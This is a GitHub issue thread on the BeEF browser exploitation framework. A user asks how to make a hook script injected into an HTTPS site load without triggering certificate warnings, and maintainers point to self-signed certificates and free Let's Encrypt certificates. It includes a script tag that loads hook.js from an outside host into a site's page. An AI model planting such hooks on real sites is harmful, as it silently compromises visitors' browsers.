### ISSUE TITLE
Beef HTTPS not Hooking

### ISSUE THREAD

**Issue by hellson92** [beefproject/beef#1641]
BEEF 0.4.7.0
Kali Linux

https://www.abcd.com.br <--- added hook 
<head>
<script src="https://another_domain:3000/hook.js"></script>
</head>

The https://www.abcd.com.br  is only hooked if I access 
https://another_domain:3000/hook.js 
and accept certificate excpetion ...
then https://www.abcd.com.br if finally hooked.

I configured beef to SSL and works fine... only if I accept exception certificate on browser....

How can I hook HTTPS sites without accept?

I can hook HTTP site, but https not...

Thanks in advance, sorry for my bad english...

**Comment by xntrik** [comment]
It sounds like you might be using a self-signed certificate?

**Comment by hellson92** [comment]
Thanks for your fast response!
I generated the certificate on my own machine and not validate on anyone C.A
My "DOMAIN" is over noip pointing to my machine.

**Comment by xntrik** [comment]
Because it's a self-generated / self-signed cert the browser will always
prompt with a security warning. Unless you've explicitly installed and
trusted the certificate in your browser or OS

**Comment by hellson92** [comment]
Will beef works in ssl sites if I buy a certificate?

exemple:

Hooked: https://www.domainA.com <--- hooked with  (valid certificate A)
Hook: https://www.domainB.com/hook.js (valid certificate B)

This is enough?
https://www.noip.com/support/knowledgebase/can-you-add-an-ssl-to-a-hostname-attached-to-no-ips-domain/

Cheers @xntrik

**Comment by bcoles** [comment]
Yes, BeEF supports SSL.

**Comment by hellson92** [comment]
@bcoles @xntrik 

Thank you.

I will make a test.

**Comment by xntrik** [comment]
Don't forget you can get free tls certs from letsencrypt
